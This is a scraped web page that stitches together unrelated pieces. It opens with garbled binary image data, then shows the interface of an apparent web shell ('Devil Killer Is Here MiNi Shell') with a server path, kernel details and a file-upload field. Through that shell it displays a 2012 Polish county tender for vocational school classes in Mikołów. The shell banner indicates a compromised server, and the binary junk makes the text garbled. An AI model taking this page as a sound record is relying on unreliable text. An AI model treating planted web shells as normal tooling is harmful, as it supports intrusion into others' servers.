JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120924/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120924/203819-N-2012.html

<p class="kh_header"><b>Mikołów: Przeprowadzenie zajęć programowych przewidzianych w ramach projektu pn. Kompetencje TAK, Stereotypy NIE II - Program Rozwoju Szkół Zawodowych i Technicznych Powiatu Mikołowskiego na lata 2012 - 2014 współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 203819 - 2012; data zamieszczenia: 24.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Mikołowskiego , ul. Żwirki i Wigury 4a, 43-190 Mikołów, woj. śląskie, tel. (032) 32-48-100,  32-48-125, faks (032) 32-48-147, 32-48-132.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mikolowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć programowych przewidzianych w ramach projektu pn. Kompetencje TAK, Stereotypy NIE II - Program Rozwoju Szkół Zawodowych i Technicznych Powiatu Mikołowskiego na lata 2012 - 2014 współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem i zakresem zamówienia jest: przeprowadzenia zajęć programowych przewidzianych w ramach projektu pn. Kompetencje TAK, Stereotypy NIE II - Program Rozwoju Szkół Zawodowych i Technicznych Powiatu Mikołowskiego na lata 2012-2014 współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.
1.1 Do zadań Wykonawcy należy przeprowadzenie następujących zajęć:
A) zajęcia z kompetencji kluczowych tj.:
1) z języka angielskiego;
2) z języka niemieckiego;
3) z matematyki;
4) z przedsiębiorczości;
5) z fizyki.
B) zajęcia z kompetencji zawodowych tj.:
1) mechanizacja i technika rolnicza;
2) eksploatacja złóż;
3) technologia żywienia;
4) systemy operacyjne;
5) proces projektowania części maszyn; 
6) podwozia i nadwozia pojazdów samochodowych;
7) proces programowania i użytkowania urządzeń i systemów mechatronicznych; 
8) blok logistyczno - spedycyjny. 
C) program doradztwa zawodowego; 
D) program wsparcia psychologiczno-pedagogicznego;

SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA
Nr 
Zadania projektowego	Rodzaj zajęć	Nazwa zajęć	Liczba grup
a)	2012-2013
b)	2013-2014
c)	Razem 	Liczba h zegarowych na 
a)grupę
b) 2012-2013
c) 2013-2014
d)Razem	Liczba uczniów 
a)min. w 1 gr.
b) min. 2012-2013
c) min. 2013-2014
d) Razem
A) Zajęcia z kompetencji kluczowych
2. 	Zajęcia z kompetencji kluczowych	Język angielski	a) 7 grup
b) 7 grup
c) 14 grup	a) 1gr. x 50h 
b) 7 gr. x 50h = 350h
c) 7 gr. x 50h = 350h
d) 14 grup x 50h = 700h	a) 15 os.
b) 105 os.
c) 105 os.
d) 210 os.
2. 	Zajęcia z kompetencji kluczowych	Język niemiecki	a) 2 grupy
b) 2 grupy
c) 4 grupy	a) 1gr. x 50h 
b) 2 gr. x 50h = 100h
c) 2 gr. x 50h = 100h
d) 4 gr. x 50h = 200h	a) 15 os.
b) 30 os.
c) 30 os.
d) 60 os.
2. 	Zajęcia z kompetencji kluczowych	Matematyka 	a) 7 grup
b) 7 grup
c) 14 grup	a) 1gr. x 50h 
b) 7 gr. x 50h = 350h
c) 7 gr. x 50h = 350h
d) 14 grup x 50h = 700h	a) 15 os.
b) 105 os.
c) 105 os.
d) 210 os.
2. 	Zajęcia z kompetencji kluczowych	Przedsiębiorczość 	a) 3 grupy
b) 3 grupy
c) 6 grup	a) 1gr. x 50h 
b) 3 gr. x 50h = 150h
c) 3 gr. x 50h = 150h
d) 6 gr. x 50h = 300h	a) 15 os.
b) 45 os.
c) 45 os.
d) 90 os.
2. 	Zajęcia z kompetencji kluczowych	Fizyka 	a) 1 grupa
b) 1 grupa
c) 2 grupy	a) 1gr. x 50h 
b) 1 gr. x 50h = 50h
c) 1 gr. x 50h = 50h
d) 2 gr. x 50h = 100h	a) 15 os.
b) 15 os.
c) 15 os.
d) 30 os.
B) Zajęcia z kompetencji zawodowych
2. 	Zajęcia z kompetencji zawodowych 	Mechanizacja i technika rolnicza 	a) 1 grupa
b) 1 grupa
c) 2 grupy	a) 1gr. x 50h 
b) 1 gr. x 50h = 50h
c) 1 gr. x 50h = 50h
d) 2 gr. x 50h = 100h	a) 15 os.
b) 15 os.
c) 15 os.
d) 30 os.
2. 	Zajęcia z kompetencji zawodowych
	Eksploatacja złóż	a) 1 grupa
b) 1 grupa
c) 2 grupy	a) 1gr. x 50h 
b) 1 gr. x 50h = 50h
c) 1 gr. x 50h = 50h
d) 2 gr. x 50h = 100h	a) 15 os.
b) 15 os.
c) 15 os.
d) 30 os.
2.	Zajęcia z kompetencji zawodowych 	Technologia żywienia 	a) 1 grupa
b) 1 grupa
c) 2 grupy	a) 1gr. x 50h 
b) 1 gr. x 50h = 50h
c) 1 gr. x 50h = 50h
d) 2 gr. x 50h = 100h	a) 15 os.
b) 15 os.
c) 15 os.
d) 30 os.
2.	Zajęcia z kompetencji zawodowych 	Systemy operacyjne	a) 1 grupa
b) 1 grupa
c) 2 grupy	a) 1gr. x 25h 
b) 1 gr. x 25h = 25h
c) 1 gr. x 25h = 25h
d) 2 gr. x 25h = 50h	a) 15 os.
b) 15 os.
c) 15 os.
d) 30 os.
2.	Zajęcia z kompetencji zawodowych 	Proces projektowania części maszyn 	a) 1 grupa
b) 1 grupa
c) 2 grupy	a) 1gr. x 25h 
b) 1 gr. x 25h = 25h
c) 1 gr. x 25h = 25h
d) 2 gr. x 25h = 50h	a) 15 os.
b) 15 os.
c) 15 os.
d) 30 os.
2.	Zajęcia z kompetencji zawodowych 	Podwozia i nadwozia pojazdów samochodowych	a) 1 grupa
b) 1 grupa
c) 2 grupy	a) 1gr. x 25h 
b) 1 gr. x 25h = 25h
c) 1 gr. x 25h = 25h
d) 2 gr. x 25h = 50h	a) 15 os.
b) 15 os.
c) 15 os.
d) 30 os.
2.	Zajęcia z kompetencji zawodowych 	Proces programowania i użytkowania urządzeń i systemów mechatronicznych	a) 1 grupa
b) 1 grupa
c) 2 grupy	a) 1gr. x 25h 
b) 1 gr. x 25h = 25h
c) 1 gr. x 25h = 25h
d) 2 gr. x 25h = 50h	a) 15 os.
b) 15 os.
c) 15 os.
d) 30 os.
2.	Zajęcia z kompetencji zawodowych 	Blok logistyczno - spedycyjny 	a) 1 grupa
b) 1 grupa
c) 2 grupy	a) 1gr. x 50h 
b) 1 gr. x 50h = 50h
c) 1 gr. x 50h = 50h
d) 2 gr. x 50h = 100h	a) 15 os.
b) 15 os.
c) 15 os.
d) 30 os.
C) Program wsparcia psychologiczno-pedagogicznego
2. 	Program wsparcia psychologiczno-pedagogicznego	Program przeciwko patologiom społecznym w szkole 	a) 11 grup
b) 11 grup
c) 22 grup	a) 1gr. x 5h 
b) 11 gr. x 5h = 55h
c) 11 gr. x 5h = 55h
d) 22 gr. x 5h = 110h	a) 15 os.
b) 165 os.
c) 165 os.
d) 330 os.
2. 	Program wsparcia psychologiczno-pedagogicznego	Indywidualne wsparcie psychologiczno-pedagogiczne	Nie dotyczy	a) nie dotyczy
b) 165 h
c) 165 h
d) 330 h	a) nie dotyczy
b) 165 os.
c) 165 os.
d) 330 os.
D) Program doradztwa zawodowego
2.Program doradztwa zawodowego	Warsztaty Rynek pracy - globalnie, regionalnie, lokalnie	a) 15 grup
b) 15 grup
c) 30 grup	a) 1gr. x 3h 
b) 15 gr. x 3h = 45h
c) 15 gr. x 3h = 45h
d) 30 gr. x 3h = 90h	a) 15 os.
b) 225 os.
c) 225 os.
d) 450 os.
2. 	Program doradztwa zawodowego	Indywidualne zajęcia z doradcą zawodowym 	Nie dotyczy	a) 2 h - osoba
b) 225 os. x 2 h = 450 h
c) 225 os. x 2 h = 450 h
d) 450 os. x 2h = 900h	a) nie dot.
b) 225 os.
c) 225 os.
d) 450 os.
LICZBA GODZIN ŁĄCZNIE	4 030 h

1.2	Wykonywanie ww zadań odbywać się będzie w siedzibie szkół zawodowych i technicznych, dla których organem prowadzącym jest Powiat Mikołowski, tj. w:

-Zespole Szkół Technicznych w Mikołowie przy ul. Rybnickiej 44;
-Zespole Szkół Ponadgimnazjalnych w Ornontowicach przy ul. Dworcowej 1;
-Zespole Szkół Energetycznych i Usługowych w Łaziskach Górnych przy ul. Chopina 11b.
1.3	Wykonywanie ww zadań odbywać się będzie przez czas trwania umowy od poniedziałku do soboty w godzinach uzgodnionych z koordynatorem projektu. 

1.4	Prawidłowość wykonania umowy zostanie potwierdzona poprzez prowadzenie dzienników zajęć i list obecności.

1.5	Wykonawca przeprowadzi w trakcie ww zajęć ankiety ewaluacyjne, testy na wejściu i na wyjściu oraz sporządzi analizę porównawczą testów wiedzy. Wzory ankiet, testów oraz analiz zostaną uzgodnione z Koordynatorem Projektu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie opisuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponuje minimum 6 osobami z wykształceniem wyższym i  wykształceniem kierunkowym: filologia angielska ( ukończone studia wyższe lub podyplomowe) oraz przygotowaniem pedagogicznym ( ukończone studia wyższe lub studium pedagogiczne lub kwalifikacyjny kurs pedagogiczny);
- dysponuje minimum  2 osobami z wykształceniem wyższym i  wykształceniem kierunkowym: filologia germańska lub germanistyka ( ukończone studia wyższe lub podyplomowe) oraz przygotowaniem pedagogicznym  ( ukończone studia wyższe lub studium pedagogiczne lub kwalifikacyjny kurs pedagogiczny);
- dysponuje minimum  5 osobami z wykształceniem wyższym i  wykształceniem kierunkowym: matematyka ( ukończone studia wyższe lub podyplomowe) oraz przygotowaniem pedagogicznym  ( ukończone studia wyższe lub studium pedagogiczne lub kwalifikacyjny kurs pedagogiczny);
- dysponuje minimum  4 osobami  z wykształceniem wyższym i  wykształceniem kierunkowym: przedsiębiorczość lub studia z zakresu ekonomii ( ukończone studia wyższe lub podyplomowe) oraz przygotowaniem pedagogicznym  ( ukończone studia wyższe lub studium pedagogiczne lub kwalifikacyjny kurs pedagogiczny);
- dysponuje minimum  1 osobą z wykształceniem wyższym i  wykształceniem kierunkowym: fizyka (ukończone studia wyższe lub podyplomowe) oraz przygotowaniem pedagogicznym  ( ukończone studia wyższe lub studium pedagogiczne lub kwalifikacyjny kurs pedagogiczny);
 - dysponuje minimum  1 osobą z wykształceniem wyższym oraz  wykształceniem kierunkowym: rolnictwo ( ukończone studia wyższe lub podyplomowe) oraz przygotowaniem pedagogicznym  ( ukończone studia wyższe lub studium pedagogiczne lub kwalifikacyjny kurs pedagogiczny);
- dysponuje minimum  1 osobą z wykształceniem wyższym i wykształceniem kierunkowym: górnictwo ( ukończone studia wyższe lub podyplomowe) oraz przygotowaniem pedagogicznym  ( ukończone studia wyższe lub studium pedagogiczne lub kwalifikacyjny kurs pedagogiczny);
- dysponuje minimum  2 osobami  z wykształceniem wyższym i wykształceniem kierunkowym: technologia żywności lub żywienia ( ukończone studia wyższe lub podyplomowe) oraz przygotowaniem pedagogicznym  ( ukończone studia wyższe lub studium pedagogiczne lub kwalifikacyjny kurs pedagogiczny);
- dysponuje minimum  1 osobą z wykształceniem wyższym i wykształceniem kierunkowym: informatyka lub elektronika ( ukończone studia wyższe lub podyplomowe) oraz przygotowaniem pedagogicznym  ( ukończone studia wyższe lub studium pedagogiczne lub kwalifikacyjny kurs pedagogiczny);
- dysponuje minimum 1 osobą z wykształceniem wyższym.i wykształceniem kierunkowym: z zakresu mechaniki ( ukończone studia wyższe lub podyplomowe) oraz przygotowaniem pedagogicznym  ( ukończone studia wyższe lub studium pedagogiczne lub kwalifikacyjny kurs pedagogiczny);
- dysponuje minimum  1 osobą z wykształceniem wyższym i  wykształceniem kierunkowym: transport( ukończone studia wyższe lub podyplomowe) oraz przygotowaniem pedagogicznym  ( ukończone studia wyższe lub studium pedagogiczne lub kwalifikacyjny kurs pedagogiczny);
- dysponuje minimum 1 osobą z wykształceniem wyższym i  wykształceniem kierunkowym: mechatronika lub mechanika lub elektronika ( ukończone studia wyższe lub podyplomowe lub kursy doskonalące lub kwalifikacyjne z zakresu mechatroniki) oraz przygotowaniem pedagogicznym  ( ukończone studia wyższe lub studium pedagogiczne lub kwalifikacyjny kurs pedagogiczny);
- dysponuje minimum 1 osoba z wykształceniem wyższym i wykształceniem kierunkowym: transport lub  spedycja lądowa ( ukończone studia wyższe lub podyplomowe) oraz przygotowaniem pedagogicznym  ( ukończone studia wyższe lub studium pedagogiczne lub kwalifikacyjny kurs pedagogiczny);
- dysponuje minimum 5 osobami z wykształceniem wyższym i wykształceniem kierunkowym: doradztwo zawodowe ( ukończone studia wyższe lub podyplomowe);
- dysponuje minimum 6 osobami z wykształceniem wyższym i  wykształceniem kierunkowym : psychologia lub resocjalizacja lub pedagogika opiekuńczo-wychowawcza ( ukończone studia wyższe lub podyplomowe);</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku.

II. Inne warunki udziału w postępowaniu .
Brak podstaw do wykluczenia wykonawcy z powodu niespełnienia warunków, o których mowa w art.24 ust.1 ustawy Prawo Zamówien Publicznych.
	
Ocena spełniania poszczególnych warunków  przez Wykonawców zostanie dokonana na podstawie złożonej oferty oraz złożonych przez wykonawców oświadczeń i dokumentów, wymaganych przez Zamawiającego w SIWZ i zostanie przeprowadzona zgodnie z formułą  spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1). wypełniony i podpisany formularz ofertowy stanowiący zał. nr 1  do SIWZ
2) Jeżeli oferta podpisana jest przez osobę inną niż upoważniona do reprezentowania wykonawcy do oferty należy załączyć pełnomocnictwo (upoważnienie)w formie oryginału podpisane przez osoby uprawnione do reprezentowania wykonawcy lub w formie kopii poświadczonej notarialnie.
3) w przypadku wykonawców wspólnie ubiegających się o udzialenia zamówienia pełnomocnictwo/upoważnieniem dla pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia  albo reprezentowania w postępowaniu i zawarcia umowy  w sprawie zamówienia publicznego.Pełnomocnictwo musi być w formie oryginału lub w formie kopii poświadczonej notarialnie. 
4. w przypadku gdy Wykonawca polega na wiedzy i doświadczeniu , osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów Wykonawca zobowiązany jest do przedstawienia pisemnego zobowiązania tych podmiotów ( np. pisemne oświadczenie podmiotu trzeciego, umowa przedwstępna, umowa generalna o współpracy ) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z art. 144 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień (Dz. U. z 2010 r. Nr 113, poz. 759 i Nr 161, poz. 1078) Zamawiający przewiduje możliwość zmiany istotnych postanowień Umowy w stosunku do treści Oferty, w następujących okolicznościach:
1.	konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy,
2.	gdy zmiana postanowień umownych jest korzystna dla Zamawiającego,
3.	w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na współfinansowanie zamówienia na usługę.
4.	w przypadku wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie zewnętrzne, nieprzewidywalne i poza kontrolą stron niniejszej umowy, którego skutkom nie można zapobiec, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu,
5.	w przypadku zmiany stanu prawnego, który będzie wnosił nowe wymagania co do sposobu realizacji jakiegokolwiek elementu usług,
6.	zmiany w kolejności i terminach wykonania przedmiotu zamówienia, na skutek zdarzeń losowych lub innych okoliczności,
7.zmiana osób odpowiedzialnych za wykonanie zadania ze strony wykonawcy i zamawiającego, która może nastąpić tylko na podstawie obiektywnych przesłanek zaakceptowanych przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mikolowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Mikołowie, ul.Żwirki i Wigury 4a, 43-190 Mikołów, wejście B, Biuro Podawcze, osobiście lub za zaliczeniem pocztowym, cena: 5 PLN plus koszt wysyłki..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.10.2012 godzina 09:00, miejsce: Starostwo Powiatowe, ul.Żwirki i Wigury 4a, 43-190 Mikołów, wejście B, parter, pokój nr 127 - kancelaria..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 01.11.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn.Kompetencje TAK, Stereotypy NIE II - Program Rozwoju Szkół Zawodowych i Technicznych Powiatu Mikołowskiego na lata 2012-2014 jest  współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego..</p>
